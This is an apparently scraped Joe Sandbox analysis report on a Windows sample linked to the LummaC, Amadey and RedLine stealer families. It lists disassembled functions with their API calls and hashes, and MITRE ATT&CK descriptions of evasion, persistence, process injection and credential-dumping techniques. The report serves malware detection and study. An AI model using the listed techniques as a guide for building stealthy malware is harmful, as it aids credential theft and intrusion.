Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 29d675bfe2c702460bdbb177ddb7aa0293c1c1735831cb29bb06368bee0cd5bd
Instruction ID: 38614254733b3fee44b41a369befa1e043c4dca9f882dfd811d4dc68799d725e
Opcode Fuzzy Hash: 29d675bfe2c702460bdbb177ddb7aa0293c1c1735831cb29bb06368bee0cd5bd
Instruction Fuzzy Hash: E2310231B101448BEF08CB68CC89B9CBBF2AB95314F2482A8E011D77D5D77A99808B92

Function 00B9A6C7 Relevance: 1.6, APIs: 1, Instructions: 104synchronizationsleepCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9A6CA
Sleep.KERNEL32(000003E8), ref: 00B9A875
CreateMutexA.KERNEL32(00000000,00000000,00BF31DC), ref: 00B9A893
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00B9A89C
GetLastError.KERNEL32 ref: 00B9A8A2

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutexObjectSingleSleepWait
String ID:
API String ID: 3807984492-0
Opcode ID: 900eb21642f1cf0cc2370fb31b9ccf83878cad537dc1835b58400e97a4a8d574
Instruction ID: 224999e28e6c717daca948875575e897b8edeeaf889ed53ee86346c40927f639
Opcode Fuzzy Hash: 900eb21642f1cf0cc2370fb31b9ccf83878cad537dc1835b58400e97a4a8d574
Instruction Fuzzy Hash: 143138316001449BDF08CB78CD8975CBBF2AB86324F2482A8E411977D5D77A5D818791

Function 00BC6BCB Relevance: 1.6, APIs: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BCA511: GetLastError.KERNEL32(?,00000000,?,00BC685A,00000000,00000000,?,?,00BC748E,00B96679,00000000,00000000), ref: 00BCA516
Part of subcall function 00BCA511: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BC748E,00B96679,00000000,00000000), ref: 00BCA5B4

_free.LIBCMT ref: 00BC6C6E

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9a7d484a4857c1c8720d11919e17128c714bd32f81e582229f069affccbf7359
Instruction ID: 5a6dacfac447cb32a5d9f18e127847714ceb4ab86a1e7b8566001d69a320dd22
Opcode Fuzzy Hash: 9a7d484a4857c1c8720d11919e17128c714bd32f81e582229f069affccbf7359
Instruction Fuzzy Hash: EC11B672D01218AECF05ABB49D05FAE7BF0EF04320F2481EEE855A61D1DA708E409791

Function 00BCAAF3 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00BCAB2D

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 171dac03f27cb4b60bb4123c1190a905a93d9467b2e2111deb5cf0b45ef04116
Instruction ID: ef3986fcb3d61276b96dbcc7975b54beb3f521cad50604a3f2a7fec6dace284f
Opcode Fuzzy Hash: 171dac03f27cb4b60bb4123c1190a905a93d9467b2e2111deb5cf0b45ef04116
Instruction Fuzzy Hash: AA111871A0420AAFCB05DF58E941E9B7BF5EF48304F054099F805EB251DA70EE15CB65

Function 00BD18CE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD1931

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: a1fcb7a79ef56f668003bb102f20a3cd8294dd02acfc15fe79f6e5fe7ecb42e7
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 4A01E172C0015DBFCF01AFA88D15EEEBFF5EB08310F1445A6F914E2151E6358A659B91

Function 00BD1615 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00BD1A05,?,?,00000000,?,00BD1A05,00000000,0000000C), ref: 00BD1632

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a35d85ee98494bb607e9fbe2d15e481cd74b07f367fed2705cfc3eac8344a1ca
Instruction ID: 61dbada384e34401a09f8c2b15d14cc8c8fbc1d8046a7854d4e02f6e9ae93062
Opcode Fuzzy Hash: a35d85ee98494bb607e9fbe2d15e481cd74b07f367fed2705cfc3eac8344a1ca
Instruction Fuzzy Hash: 5ED06C3201014DBBDF029F84DC46EDA3BAAFB48714F118000BA1856020C772E861AB90

Non-executed Functions

Function 00BB43EE Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00BB4448

Part of subcall function 00BB4229: RtlInitializeSListHead.NTDLL(?), ref: 00BB42F5
Part of subcall function 00BB4229: RtlInitializeSListHead.NTDLL(?), ref: 00BB42FF

ListArray.LIBCONCRT ref: 00BB447C
Hash.LIBCMT ref: 00BB44E5
Hash.LIBCMT ref: 00BB44F5
RtlInitializeSListHead.NTDLL(?), ref: 00BB458A
RtlInitializeSListHead.NTDLL(?), ref: 00BB4597
RtlInitializeSListHead.NTDLL(?), ref: 00BB45A4
RtlInitializeSListHead.NTDLL(?), ref: 00BB45B1

Part of subcall function 00BB9B51: std::bad_exception::bad_exception.LIBCMT ref: 00BB9B73

RegisterWaitForSingleObject.KERNEL32(?,00000000,00BB7925,?,000000FF,00000000), ref: 00BB4639
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00BB465B
GetLastError.KERNEL32(00BB539B,?,?,00000000,?,?), ref: 00BB466D
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00BB468A

Part of subcall function 00BAFABA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,00BB539B,00000008,?,00BB468F,?,00000000,00BB7916,?,7FFFFFFF,7FFFFFFF,00000000), ref: 00BAFAD2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BB46B4

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: aa98e946a70120fc52649a25e76880af57e1ddde638f5f97beccb09dc8df75fb
Instruction ID: ab317e2913408c55d54a0a0bd81fe350ba89981b0a070ffe1f6ed21cd4f8de19
Opcode Fuzzy Hash: aa98e946a70120fc52649a25e76880af57e1ddde638f5f97beccb09dc8df75fb
Instruction Fuzzy Hash: 408182B0A11B56BBD718DF74C885BE9FBE8BF09700F00425AF52997281CBB4A564CBD1

Function 00BCA3F9 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BCA40F

Part of subcall function 00BCAC95: HeapFree.KERNEL32(00000000,00000000,?,00BCEF6D,?,00000000,?,?,?,00BCEF94,?,00000007,?,?,00BCF396,?), ref: 00BCACAB
Part of subcall function 00BCAC95: GetLastError.KERNEL32(?,?,00BCEF6D,?,00000000,?,?,?,00BCEF94,?,00000007,?,?,00BCF396,?,?), ref: 00BCACBD

_free.LIBCMT ref: 00BCA41B
_free.LIBCMT ref: 00BCA426
_free.LIBCMT ref: 00BCA431
_free.LIBCMT ref: 00BCA43C
_free.LIBCMT ref: 00BCA447
_free.LIBCMT ref: 00BCA452
_free.LIBCMT ref: 00BCA45D
_free.LIBCMT ref: 00BCA468
_free.LIBCMT ref: 00BCA476

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d7665fd946306ba29e757249cb728c3ec4bf59ede0e6ad3219efb4d4c957eb0f
Instruction ID: 2ef8184bea3d3d4865ec5f0810776194c2be98754ec3ca42d3df3493d2395349
Opcode Fuzzy Hash: d7665fd946306ba29e757249cb728c3ec4bf59ede0e6ad3219efb4d4c957eb0f
Instruction Fuzzy Hash: 7921677690010CAFCB42EFA4C885EDE7BF9EF08354B0145AAB5159F121DB31DA588B95

Function 00BD01A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,00BD04EF,00B986B0,00B986B0,00000000,00BEFAF0,0000000F,00B986B0,00B986B0,00B986B0,0000000F,00000000), ref: 00BD028F
GetLastError.KERNEL32(00BD04EF,00B986B0,00B986B0,00000000,00BEFAF0,0000000F,00B986B0,00B986B0,00B986B0,0000000F,00000000,?,00BC671A,00000000,00BEFAF0,00000010), ref: 00BD02BF

Strings

/!8, xrefs: 00BD01B5

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: /!8
API String ID: 442123175-2196672732
Opcode ID: f58b8cf812a0ad85118ecb6529f031f6478809bc173e3d97c361fc9525b8f1c2
Instruction ID: 58c374fb7599497019a64d3b27135510e71efdd735991797772d84455ddeaf00
Opcode Fuzzy Hash: f58b8cf812a0ad85118ecb6529f031f6478809bc173e3d97c361fc9525b8f1c2
Instruction Fuzzy Hash: F4317075A11219AFDB24DF69DC95BE9B7F9EB44300F1440EAE505D7390EA70EE80CB60

Function 00BD00BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00B986B0,00000000,?,00BD04DF,00B986B0,00B986B0,00000000,00BEFAF0,0000000F,00B986B0), ref: 00BD0167
GetLastError.KERNEL32(?,00BD04DF,00B986B0,00B986B0,00000000,00BEFAF0,0000000F,00B986B0,00B986B0,00B986B0,0000000F,00000000,?,00BC671A,00000000,00BEFAF0), ref: 00BD018D

Strings

/!8, xrefs: 00BD00CC

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: /!8
API String ID: 442123175-2196672732
Opcode ID: 7c36fb75a4f9f6554182afc7cb95d1e860134a7b313d1b0c0e510c4724253a0a
Instruction ID: 63ee131ccab39ed223eb1eb55a77b73f854b11e78a0bb221e3e3f61515106ee4
Opcode Fuzzy Hash: 7c36fb75a4f9f6554182afc7cb95d1e860134a7b313d1b0c0e510c4724253a0a
Instruction Fuzzy Hash: 35215331A102199BCB24DF19DC81AA9F3F9EF48314F1445AAF919EB351E730DD85CB61

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hsRju5CPK2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

